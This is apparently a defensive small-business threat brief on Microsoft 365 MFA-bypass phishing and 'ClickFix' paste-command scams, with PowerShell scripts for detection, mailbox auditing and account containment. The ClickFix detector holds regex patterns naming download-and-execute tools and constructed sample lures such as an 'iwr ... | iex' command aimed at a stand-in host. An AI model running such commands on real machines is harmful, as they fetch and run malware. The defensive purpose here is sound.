Free practical cybersecurity guidance for organisations without a security team.
hello@actionsoncyber.com

Daily SMB Cyber Intelligence Brief

Today’s SMB cyber lookout: Microsoft 365 phishing (MFA bypass) and “ClickFix” website traps

What small and medium-sized businesses should look out for today.

High | Monday 25 May 2026, 17:12 UK time
Today’s look-out: Account takeover phishing and website-injected “ClickFix” scams

What to look out for today

Two themes to brief staff and check controls against today:

  • Microsoft 365 account takeover phishing being sold as a service (PhaaS). The kits include techniques that defeat MFA without breaking it: relaying the genuine Microsoft sign-in through the attacker's site so the session cookie is captured after the user completes MFA, or getting the user to enter an attacker-generated device code on the real Microsoft page.
  • “ClickFix” style attacks, where compromised websites inject fake error, CAPTCHA or “verification” prompts that tell the user to “fix” the problem by copying a command and pasting it into the Windows Run box or a terminal. The pasted command fetches malware or a credential stealer, so the user does the installing.

Why this matters to smaller businesses

  • Email compromise leads to invoice fraud. If attackers get into a mailbox, they can watch for invoices, change bank details, and reply in-thread convincingly.
  • Microsoft 365 is a single point of failure. A stolen M365 session can expose email, OneDrive/SharePoint documents, Teams chats, and customer data.
  • “ClickFix” targets non-technical staff. The user runs the command themselves, so there is no exploit, no attachment and often no download for email or web filters to block, and anyone who browses to a compromised site can be caught.
  • Supply-chain ripple effects. Even if your organisation isn’t targeted directly, a compromised supplier website or a commonly used website platform can become the delivery mechanism.

Warning signs

  • Unexpected sign-in prompts that mention “device code”, “pairing” or “approve sign-in”, or an email or pop-up telling you to go to microsoft.com/devicelogin and enter a code when you weren't trying to sign in to a new device.
  • MFA prompts that arrive out of the blue, or staff reporting “I had to do something different to log in today”.
  • Browser pop-ups or website banners claiming “Security check failed”, “Update required”, “Verification needed” or “Click to fix”, especially if they tell you to press Windows+R, open PowerShell or a terminal, and paste something you have just copied, or to download a “fix”.
  • New email rules, auto-forwarding, or messages disappearing or turning up in Deleted Items that a user can't explain.
  • Customers/suppliers receiving strange emails from your staff that they weren’t expecting.

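If a user reports one of the “Click to fix” pop-ups above, the quickest way to tell whether they actually followed it is to look where the pasted command survives on their PC. The script below is an added example written for this brief, not code from Actions On Cyber: it classifies command lines with a set of ClickFix-style heuristics (script hosts or shells launched to fetch and run something from the web), runs the classifier over a few constructed sample commands, and then reads the current user's Win+R history (the RunMRU registry key) and PowerShell console history on the machine it is run on. The sample commands and the lure.invalid host are made up for the demonstration.

```powershell
# Added example (not from the Actions On Cyber brief). Run in PowerShell on the
# Windows PC as the user who saw the pop-up; it only reads that user's own history.

function Test-ClickFixCommand {
    # Returns $true when a command line looks like a typical ClickFix payload.
    param([Parameter(Mandatory)][string]$Command)
    $patterns = @(
        'mshta(\.exe)?\s+\S*https?://',
        '(powershell|pwsh)(\.exe)?\s.*(\s-e(nc|c)?\s|\s-encodedcommand\s|iex|invoke-expression|iwr|invoke-webrequest|downloadstring|frombase64string)',
        'curl(\.exe)?\s.*\|\s*(cmd|powershell|pwsh)',
        '(certutil|bitsadmin)(\.exe)?\s.*(-urlcache|/transfer)',
        'cmd(\.exe)?\s+/c\s.*(powershell|mshta|curl|start\s+https?://)',
        '(wscript|cscript|rundll32|regsvr32)(\.exe)?\s.*(https?://|\\\\)'
    )
    foreach ($p in $patterns) {
        if ($Command -match $p) { return $true }   # -match is case-insensitive
    }
    return $false
}

function Get-ClickFixArtifact {
    # Collects the two places a pasted command usually survives:
    # the Win+R history (RunMRU) and the PSReadLine console history.
    $hits = @()
    $mru = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
    if ($mru) {
        foreach ($prop in $mru.PSObject.Properties) {
            if ($prop.Name -eq 'MRUList' -or $prop.Name -like 'PS*') { continue }
            $cmd = ([string]$prop.Value) -replace '\\1$', ''   # entries are stored as "<command>\1"
            if (Test-ClickFixCommand $cmd) {
                $hits += [pscustomobject]@{ Source = 'RunMRU'; Entry = $cmd }
            }
        }
    }
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    if (Test-Path $history) {
        foreach ($line in Get-Content $history) {
            if (Test-ClickFixCommand $line) {
                $hits += [pscustomobject]@{ Source = 'PSReadLine'; Entry = $line }
            }
        }
    }
    return $hits
}

# Constructed sample commands to show the classifier offline (not real lures).
$samples = @(
    'powershell -w hidden -c "iwr https://lure.invalid/v | iex" # I am not a robot - reCAPTCHA Verification ID: 7811',
    'mshta https://lure.invalid/verify.hta',
    'cmd /c start https://lure.invalid/fix',
    'notepad',
    'powershell'
)
$samples | ForEach-Object { [pscustomobject]@{ Suspicious = (Test-ClickFixCommand $_); Command = $_ } } |
    Format-Table -AutoSize

# Live check of this machine; any row returned is a reason to isolate the PC and
# treat the user's credentials and sessions as compromised.
Get-ClickFixArtifact | Format-Table -AutoSize -Wrap
```

The first three samples are flagged and the last two are not. On a real machine expect some false positives from an administrator's own scripting in the PSReadLine history; a hit in RunMRU on an ordinary user's PC is much harder to explain away. The patterns are deliberately broad heuristics, not a signature for any one campaign.
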
How attackers may exploit the situation

  • Phishing-as-a-service (PhaaS) lowers the barrier: attackers can rapidly launch realistic M365 login pages and workflows at scale.
  • Some M365 phishing kits proxy the real sign-in page: the user types their password and completes MFA on what is genuinely Microsoft behind the scenes, and the kit captures the session cookie or token that comes back, which lets the attacker use the account without triggering MFA again.
  • Compromised websites can inject scripts that push users into “ClickFix” actions — making the victim do the risky part themselves.
  • Once inside email, criminals often aim for payment diversion (changing bank details) and data theft (contracts, payroll, customer lists).

What to do today

  • Send a 2-minute staff message: “If a login asks for a device code/pairing you didn’t start, or a website asks you to ‘ClickFix’ something, stop and report it.”
  • Check for mailbox tampering on key accounts (finance, directors, shared inboxes): forwarding set on the mailbox itself, inbox rules (especially ones that forward, delete, mark as read, or move mail to obscure folders such as RSS Feeds), new delegates or Send As permissions, recently consented apps, and sign-ins from unfamiliar countries, IP addresses or client apps.
  • Tighten payment process: mandate call-back verification (using known numbers) for any change of bank details or urgent payment request — even if the email thread looks genuine.
  • Make reporting easy: ensure staff know exactly how to report suspicious emails/pop-ups (shared mailbox, IT ticket, or the “Report phishing” button).
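
The mailbox check above is the one step in this list an IT provider can script rather than click through. The following is an added example written for this brief, not Actions On Cyber's own tooling: it uses the Exchange Online PowerShell module to sweep a list of high-value mailboxes for mailbox-level forwarding, leaky or hiding inbox rules, non-owner FullAccess and Send As permissions, and then pulls the unified audit log for who changed rules or forwarding recently and from which IP. The three mailbox addresses are constructed placeholders; the account running it needs an Exchange admin (or View-Only) role.

```powershell
# Added example (not from the Actions On Cyber brief).
# Requires: Install-Module ExchangeOnlineManagement -Scope CurrentUser
Connect-ExchangeOnline

function Find-MailboxTampering {
    param(
        [Parameter(Mandatory)][string[]]$Mailbox,
        [int]$Days = 14
    )
    $findings = @()

    foreach ($m in $Mailbox) {
        # 1. Mailbox-level forwarding (often set with Set-Mailbox after a takeover).
        $mb = Get-Mailbox -Identity $m
        if ($mb.ForwardingSmtpAddress -or $mb.ForwardingAddress) {
            $findings += [pscustomobject]@{ Mailbox = $m; Type = 'Forwarding'
                Detail = "$($mb.ForwardingSmtpAddress) $($mb.ForwardingAddress) KeepCopy=$($mb.DeliverToMailboxAndForward)" }
        }

        # 2. Inbox rules that leak, hide or destroy mail. Attackers favour rules that
        #    forward or redirect, and rules that delete, mark read, or bury mail in
        #    folders nobody opens (RSS Feeds, Archive, Conversation History, Junk).
        foreach ($r in Get-InboxRule -Mailbox $m) {
            $leaks = $r.ForwardTo -or $r.ForwardAsAttachmentTo -or $r.RedirectTo
            $hides = $r.DeleteMessage -or $r.MarkAsRead -or
                     ($r.MoveToFolder -match 'RSS|Archive|Conversation History|Junk')
            if ($leaks -or $hides) {
                $findings += [pscustomobject]@{ Mailbox = $m; Type = 'InboxRule'
                    Detail = "'$($r.Name)' Enabled=$($r.Enabled) Fwd=$($r.ForwardTo) Redir=$($r.RedirectTo) Del=$($r.DeleteMessage) Move=$($r.MoveToFolder)" }
            }
        }

        # 3. Delegates: FullAccess or Send As granted to anyone other than the owner.
        foreach ($p in Get-MailboxPermission -Identity $m |
                 Where-Object { $_.User -notlike 'NT AUTHORITY\SELF' -and -not $_.IsInherited }) {
            $findings += [pscustomobject]@{ Mailbox = $m; Type = 'FullAccess'; Detail = "$($p.User) $($p.AccessRights)" }
        }
        foreach ($p in Get-RecipientPermission -Identity $m |
                 Where-Object { $_.Trustee -notlike 'NT AUTHORITY\SELF' }) {
            $findings += [pscustomobject]@{ Mailbox = $m; Type = 'SendAs'; Detail = "$($p.Trustee) $($p.AccessRights)" }
        }
    }

    # 4. Who changed rules, forwarding or permissions recently, and from which IP.
    #    Desktop Outlook logs rule edits as UpdateInboxRules (no Parameters field);
    #    web/PowerShell edits log the cmdlet name with its parameters. If the tenant
    #    no longer exposes Search-UnifiedAuditLog, run the same search in Purview Audit.
    $ops = 'New-InboxRule', 'Set-InboxRule', 'UpdateInboxRules', 'Set-Mailbox',
           'Add-MailboxPermission', 'Add-RecipientPermission'
    $records = Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-$Days) -EndDate (Get-Date) `
               -UserIds $Mailbox -Operations $ops -ResultSize 5000
    foreach ($rec in $records) {
        $d = $rec.AuditData | ConvertFrom-Json
        $params = ($d.Parameters | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join '; '
        $findings += [pscustomobject]@{ Mailbox = $rec.UserIds; Type = "Audit:$($rec.Operations)"
            Detail = "$($rec.CreationDate) from $($d.ClientIP) $params" }
    }
    return $findings
}

# Constructed watch list: finance, leadership and a shared inbox.
$watch = 'finance@contoso.example', 'ceo@contoso.example', 'accounts@contoso.example'
Find-MailboxTampering -Mailbox $watch | Sort-Object Mailbox, Type | Format-Table -AutoSize -Wrap
```

An empty result is not proof of a clean tenant, only that these particular persistence mechanisms are absent; a Set-Mailbox audit record whose ClientIP is not one of your offices, or a rule named with a single character or a blank name, is worth an immediate call to the mailbox owner.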

Ask your IT provider

  • Do we have conditional access and sign-in risk alerts enabled for Microsoft 365, and who monitors them?
  • Can we use Conditional Access to block device code flow and legacy authentication, and require phishing-resistant MFA (FIDO2 security keys or Windows Hello for Business) for finance and admin accounts?
  • Do we alert on new mailbox forwarding rules, new inbox rules, and suspicious OAuth/app consent activity?
  • If a user reports a “ClickFix” pop-up, what is the immediate triage playbook (isolate device, check browser extensions, credential reset, token revocation, log review)?
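
The triage playbook in the last question is worth having written down before it is needed. The script below is an added example for this brief, not a procedure from Actions On Cyber or Microsoft: it covers the identity side of the playbook for one user with Microsoft Graph PowerShell and Exchange Online PowerShell, containing the account first (new password, then revoke every session and token, then strip mailbox forwarding and leaky rules) and then gathering the evidence an IT provider should review (OAuth consents the user granted, registered MFA methods, and the last week of sign-ins). Device isolation and browser-extension checks happen on the endpoint and are not covered here. The user principal name is a constructed placeholder; the operator needs a role such as User Administrator plus Exchange admin rights, and reading sign-in logs through Graph requires an Entra ID P1 licence.

```powershell
# Added example (not from the Actions On Cyber brief).
# Requires: Install-Module Microsoft.Graph, ExchangeOnlineManagement
$scopes = 'User.ReadWrite.All', 'Directory.AccessAsUser.All', 'AuditLog.Read.All', 'Directory.Read.All',
          'UserAuthenticationMethod.Read.All', 'DelegatedPermissionGrant.ReadWrite.All'
Connect-MgGraph -Scopes $scopes
Connect-ExchangeOnline

function Invoke-CompromisedUserTriage {
    param(
        [Parameter(Mandatory)][string]$User,
        [int]$Days = 7,
        [switch]$Contain   # without this switch the function only reports
    )
    if ($Contain) {
        # 1. New password first, then revoke every refresh token and session cookie.
        #    Revocation alone is useless if the attacker still has the password; a
        #    password change alone is useless while they still hold a valid token.
        $chars = @(48..57) + @(65..90) + @(97..122)
        $newPassword = -join ($chars | Get-Random -Count 24 | ForEach-Object { [char]$_ })
        Update-MgUser -UserId $User -PasswordProfile @{ Password = $newPassword; ForceChangePasswordNextSignIn = $true }
        Revoke-MgUserSignInSession -UserId $User | Out-Null

        # 2. Remove mailbox persistence: forwarding, and rules that leak or hide mail.
        Set-Mailbox -Identity $User -ForwardingSmtpAddress $null -ForwardingAddress $null -DeliverToMailboxAndForward $false
        Get-InboxRule -Mailbox $User |
            Where-Object { $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo -or $_.DeleteMessage } |
            Disable-InboxRule -Confirm:$false
    }

    # 3. OAuth consents: an app the user "approved" during the phish keeps its
    #    access after the password reset. Review, then remove with
    #    Remove-MgOauth2PermissionGrant -OAuth2PermissionGrantId <GrantId>.
    $grants = foreach ($g in Get-MgUserOauth2PermissionGrant -UserId $User) {
        $sp = Get-MgServicePrincipal -ServicePrincipalId $g.ClientId
        [pscustomobject]@{ GrantId = $g.Id; App = $sp.DisplayName; Publisher = $sp.PublisherName; Scope = $g.Scope }
    }

    # 4. MFA methods: attackers who steal a session often register their own
    #    authenticator so they can get back in. Anything the user does not recognise must go.
    $methods = Get-MgUserAuthenticationMethod -UserId $User |
        Select-Object Id, @{ n = 'Type'; e = { $_.AdditionalProperties['@odata.type'] -replace '#microsoft.graph.', '' } }

    # 5. Sign-in review: unfamiliar IPs or countries, unexpected client apps, and
    #    MFA satisfied from a place the user has never been.
    $since = (Get-Date).ToUniversalTime().AddDays(-$Days).ToString('yyyy-MM-ddTHH:mm:ssZ')
    $signIns = Get-MgAuditLogSignIn -Filter "userPrincipalName eq '$User' and createdDateTime ge $since" -All |
        Select-Object CreatedDateTime, IpAddress,
            @{ n = 'Country'; e = { $_.Location.CountryOrRegion } },
            ClientAppUsed, AppDisplayName,
            @{ n = 'MFA'; e = { $_.AuthenticationRequirement } },
            @{ n = 'Result'; e = { if ($_.Status.ErrorCode -eq 0) { 'Success' } else { $_.Status.FailureReason } } }

    [pscustomobject]@{ User = $User; OAuthGrants = $grants; MfaMethods = $methods; SignIns = $signIns }
}

# Constructed placeholder user. Drop -Contain to collect evidence without changing anything.
$result = Invoke-CompromisedUserTriage -User 'a.smith@contoso.example' -Contain
$result.OAuthGrants | Format-Table -AutoSize
$result.MfaMethods  | Format-Table -AutoSize
$result.SignIns     | Sort-Object CreatedDateTime | Format-Table -AutoSize
```

Keep the order: containment before the user is told anything, because a phone call to the victim while the attacker still holds a live session can prompt them to register an extra MFA method or add a forwarding rule. Any OAuth grant to an app nobody in the business recognises should be removed, and any MFA method the user did not register should be deleted before the account is handed back.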

Patch watch

If your organisation (or your web agency) uses Ghost CMS, there are reports of a live campaign exploiting a SQL injection flaw (CVE-2026-26980) to compromise sites and push “ClickFix” lures. This is mainly a risk for businesses running their own websites: ask whoever manages your site to confirm whether Ghost is used anywhere, and whether mitigations/updates have been applied.

One action today

Send a short internal warning today: “Never enter device/pairing codes you didn’t request, and never follow ‘ClickFix’ instructions from a website pop-up—report it to IT immediately.”

Related Actions On Cyber resource

CTA: Actions On Cyber checklist — “Invoice fraud & bank detail change verification (call-back process)”

Sources

This brief is for general awareness and does not replace advice from your IT provider, legal adviser, insurer or incident response specialist.